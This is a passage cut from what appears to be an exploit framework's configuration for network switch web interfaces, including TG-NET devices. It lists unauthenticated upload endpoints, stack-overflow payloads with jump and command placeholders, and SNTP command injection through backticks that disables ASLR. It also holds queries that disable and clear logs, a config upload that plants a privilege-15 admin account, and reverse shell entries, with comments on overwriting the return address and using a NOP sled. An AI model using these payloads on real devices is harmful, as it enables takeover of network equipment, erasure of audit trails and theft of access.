True,\r\n\t\t\t\t\t\t'json':False,\r\n\t\t\t\t\t\t'disable_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'disable_query':'LOGGING_SERVICE=0&cmd=5121',\r\n\t\t\t\t\t\t'status':'',\r\n\t\t\t\t\t\t'clean_logfile_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'clean_logfile_query':'cmd_5132=Clear+file+messages',\r\n\t\t\t\t\t\t'clean_logmem_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'clean_logmem_query':'cmd_5132=Clear+buffered+messages',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t# Verify lacking authentication\r\n\t\t\t\t'verify': {\r\n\t\t\t\t\t\t'httpuploadbakcfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload \"backup-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpuploadbakcfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':' Invalid config file!!', # one 0x20 in beginning\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpuploadruncfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/update \"running-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':' Invalid config file!!', # one 0x20 in beginning\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httprestorecfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload \"startup-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httprestorecfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':' Invalid config file!!', # one 0x20 in beginning\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpupload.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/Upgrade \"Firmware\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':'Image Signature Error',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'dispatcher.cgi': { # 'username' also suffer from stack overflow\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t\t'content':'username=admin&password='+ self.random_string(184) + '&login=1',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'priv15_account': {\r\n\t\t\t\t\t\t'description':'Upload/Update running-config (PoC: add priv 15 credentials)',\r\n\t\t\t\t\t\t'json':False,\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'encryption':'md5',\r\n\t\t\t\t\t\t'content':'Content-Type\\n\\nSYSTEM CONFIG FILE ::= BEGIN\\nusername \"USERNAME\" secret encrypted PASSWORD\\n\\n------',\r\n\t\t\t\t\t\t'add_uri':'/cgi-bin/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t'del_query':'', \r\n\t\t\t\t\t\t'del_uri':'/cgi-bin/dispatcher.cgi?cmd=526&usrName=USERNAME',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'sntp': {\r\n\t\t\t\t\t\t'description':'SNTP command injection (PoC: disable ASLR)',\r\n\t\t\t\t\t\t'json':False,\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'enable_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'enable_query':'sntp_enable=1&cmd=548',\r\n\t\t\t\t\t\t'status_uri':'/cgi/get.cgi?cmd=sys_timeSettings',\r\n\t\t\t\t\t\t'inject_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'inject_query':'sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123&cmd=550',\r\n\t\t\t\t\t\t'check_query':'sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123&cmd=550',\r\n\t\t\t\t\t\t'delete_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'delete_query':'sntp_Server=+&sntp_Port=123&cmd=550',\r\n\t\t\t\t\t\t'disable_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'disable_query':'sntp_enable=0&cmd=548',\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The stack overflow in 'username' and 'password' at same request are multipurpose.\r\n\t\t\t\t\t#\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The trick to jump and execute:\r\n\t\t\t\t\t# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]\r\n\t\t\t\t\t# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary\r\n\t\t\t\t\t# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)\r\n\t\t\t\t\t# 4. We will also feed required function parameters, by adding them to '_CMD_'\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\r\n\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'content':'username='+ self.random_string(212) +'_JUMP_&password='+ self.random_string(180) +'&login=1&_CMD_',\r\n\t\t\t\t\t\t'sys_ping_post_check':'',\r\n\t\t\t\t\t\t'sys_ping_post_SIGSEGV': False,\t\t# SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':True,\t# My LAB workaround\r\n\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable/Clean logs)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'content':'username='+ self.random_string(212) +'_JUMP_&password='+ self.random_string(180) +'_CMD_&login=1',\r\n\r\n\t\t\t\t\t\t'log_settings_set_cmd':'&LOGGING_SERVICE=0',# Disable Logging CMD\r\n\t\t\t\t\t\t'log_settings_set_SIGSEGV':False,\t\t\t# Disable Logging SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_ramClear_cmd':'',\t\t\t\t\t\t# Clean RAM log CMD\r\n\t\t\t\t\t\t'log_ramClear_SIGSEGV':False,\t\t\t\t# Clean RAM log SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_fileClear_cmd':'',\t\t\t\t\t\t# Clean FILE log CMD\r\n\t\t\t\t\t\t'log_fileClear_SIGSEGV':False,\t\t\t\t# Clean FILE log SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':True,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'content':'username='+ self.random_string(212) +'_JUMP_&password='+ self.random_string(180) +'_CMD_&login=1',\r\n\r\n\t\t\t\t\t\t'sys_timeSntp_set_cmd':'&sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123',\r\n\t\t\t\t\t\t'sys_timeSntp_set_check':'&sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=139',\r\n\r\n\t\t\t\t\t\t'sys_timeSntpDel_set_cmd':'&sntp_Server=+&sntp_Port=139',\r\n\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_enable':'&sntp_enable=1',\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_disable':'&sntp_enable=0',\r\n\t\t\t\t\t\t'sys_timeSettings_set_SIGSEGV': False,\t\t# SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround': True,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.\r\n\t\t\t\t\t# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',\r\n\t\t\t\t\t\t'query':'username=_ALIGN_USRNOP&password=_PWDNOP_RA_START&login=1&shellcode=_USRNOP_USRNOP_USRNOP_SHELLCODE',\r\n\t\t\t\t\t\t'workaround':True,\t# My LAB workaround\r\n\t\t\t\t\t\t'stack':True, # False = use Heap, and there are no ASLR\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\r\n\t\t\t\t\t},\r\n\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t'TG-NET': {\r\n\t\t\t\t'vendor': 'Shenzhen TG-NET Botone Technology Co,. Ltd.',\r\n\t\t\t\t'uri':'http://www.tg-net.net/productshow.asp?ProdNum=1049&parentid=98',\r\n\t\t\t\t'modulus_uri':'',\r\n\t\t\t\t'info_leak':False,\r\n\t\t\t\t'info_leak_JSON':False,\r\n\t\t\t\t'info_leak_uri':'',\r\n\t\t\t\t'xsid':False,\r\n\t\t\t\t'xsid_uri':'',\r\n\t\t\t\t'login': {\r\n\t\t\t\t\t'description':'Login/Logout on remote device',\r\n\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t'json':False,\r\n\t\t\t\t\t'encryption':'clear',\r\n\t\t\t\t\t'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t'query':'username=USERNAME&password=PASSWORD&login=1',\r\n\t\t\t\t\t'status_uri':'/cgi-bin/dispatcher.cgi?cmd=547',\r\n\t\t\t\t\t'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',\r\n\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t'log':{\r\n\t\t\t\t\t\t'description':'Disable and clean logs',\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'json':False,\r\n\t\t\t\t\t\t'disable_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'disable_query':'LOGGING_SERVICE=0&cmd=4353',\r\n\t\t\t\t\t\t'status':'/cgi-bin/dispatcher.cgi?cmd=4352',\r\n\t\t\t\t\t\t'clean_logfile_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'clean_logfile_query':'cmd_4364=Clear+file+messages',\r\n\t\t\t\t\t\t'clean_logmem_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'clean_logmem_query':'cmd_4364=Clear+buffered+messages',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t# Verify lacking authentication\r\n\t\t\t\t'verify': {\r\n\t\t\t\t\t\t'httpuploadbakcfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload \"backup-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpuploadbakcfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':' Invalid config file!!', # one 0x20 in beginning\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpuploadruncfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/update \"running-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':' Invalid config file!!', # one 0x20 in beginning\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httprestorecfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload \"startup-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httprestorecfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':' Invalid config file!!', # one 0x20 in beginning\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpupload.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/Upgrade \"Firmware\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':'Image Signature Error',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'dispatcher.cgi': { # 'username' also suffer from stack overflow\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t\t'content':'username=admin&password='+ self.random_string(184) + '&login=1',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpuploadfirmware.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/Upgrade \"Firmware\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpuploadfirmware.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':'Image Signature Error',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpupload_runstart_cfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/update \"running-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpupload_runstart_cfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/startup-config',\r\n\t\t\t\t\t\t\t'content':'/tmp/startup-config',\r\n\t\t\t\t\t\t\t'content_check':'/tmp/startup-config',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'version_upgrade.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/Upgrade \"Firmware\" (Frontend to \"httpuploadfirmware.cgi\")',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/version_upgrade.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'Firm Upgrade',\r\n\t\t\t\t\t\t\t'content_check':'Firm Upgrade',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'factory_reset.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Reset device to factory default (PoC: Too dangerous to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/factory_reset.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'Too dangerous to verify',\r\n\t\t\t\t\t\t\t'content_check':'dummy',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': False\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'sysinfo_config.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'description':'System basic information configuration (Frontend to \"change_mac_addr_set.cgi\")',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/sysinfo_config.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':'\"/cgi-bin/change_mac_addr_set',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'change_mac_addr_set.cgi': {\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"switch_type/sys_hardver\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/change_mac_addr_set.cgi',\r\n\t\t\t\t\t\t\t'content':'switch_type='+ self.random_string(116) +'&sys_hardver=31337&sys_macaddr=DE:AD:BE:EF:13:37&sys_serialnumber=DE:AD:BE:EF:13:37&password=tgnetadmin',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\r\n\t\t\t\t},\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'priv15_account': {\r\n\t\t\t\t\t\t'description':'Upload/Update running-config (PoC: add priv 15 credentials)',\r\n\t\t\t\t\t\t'json':False,\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'encryption':'clear',\r\n\t\t\t\t\t\t'content':'Content-Type\\n\\nSYSTEM CONFIG FILE ::= BEGIN\\nusername \"USERNAME\" password PASSWORD\\n\\n------',\r\n\t\t\t\t\t\t'add_uri':'/cgi-bin/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t'del_query':'', \r\n\t\t\t\t\t\t'del_uri':'/cgi-bin/dispatcher.cgi?cmd=524&usrName=USERNAME',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'sntp': {\r\n\t\t\t\t\t\t'description':'SNTP command injection (PoC: disable ASLR)',\r\n\t\t\t\t\t\t'json':False,\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'enable_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'enable_query':'sntp_enable=1&cmd=548',\r\n\t\t\t\t\t\t'status_uri':'cmd=547',\r\n\t\t\t\t\t\t'inject_uri':'/cgi-bin/dispatcher.cgi',\r\n\r\n\t\t\t\t\t\t'inject_query':'sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123&cmd=550',\r\n\t\t\t\t\t\t'check_query':'sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123&cmd=550',\r\n\r\n\t\t\t\t\t\t'delete_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'delete_query':'sntp_Server=+&sntp_Port=123&cmd=550',\r\n\t\t\t\t\t\t'disable_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'disable_query':'sntp_enable=0&cmd=548',\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The stack overflow in 'username' and 'password' at same request are multipurpose.\r\n\t\t\t\t\t#\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The trick to jump and execute:\r\n\t\t\t\t\t# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]\r\n\t\t\t\t\t# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary\r\n\t\t\t\t\t# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)\r\n\t\t\t\t\t# 4. We will also feed required function parameters, by adding them to '_CMD_'\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable/Clean logs)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'_CMD_&login=1',\r\n\r\n\t\t\t\t\t\t'log_settings_set_cmd':'&LOGGING_SERVICE=0',\t\t\t# Disable Logging CMD\r\n\t\t\t\t\t\t'log_settings_set_SIGSEGV':True,\t\t\t\t\t\t# Disable Logging SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_ramClear_cmd':'',\t\t\t\t\t\t\t\t\t# Clean RAM log CMD\r\n\t\t\t\t\t\t'log_ramClear_SIGSEGV':False,\t\t\t\t\t\t\t# Clean RAM log SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_fileClear_cmd':'',\t\t\t\t\t\t\t\t\t# Clean FILE log CMD\r\n\t\t\t\t\t\t'log_fileClear_SIGSEGV':False,\t\t\t\t\t\t\t# Clean FILE log SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'_CMD_&login=1',\r\n\t\t\t\t\t\t'sys_timeSntp_set_cmd':'&sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123',\r\n\t\t\t\t\t\t'sys_timeSntp_set_check':'&sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123',\r\n\t\t\t\t\t\t'sys_timeSntpDel_set_cmd':'&sntp_Server=+&sntp_Port=123',\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_enable':'&sntp_enable=1',\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_disable':'&sntp_enable=0',\r\n\t\t\t\t\t\t'sys_timeSettings_set_SIGSEGV': False,\t\t# SIGSEGV ?\r\n\t\t\t\t\t\t'workaround':True,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.\r\n\t\t\t\t\t# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': 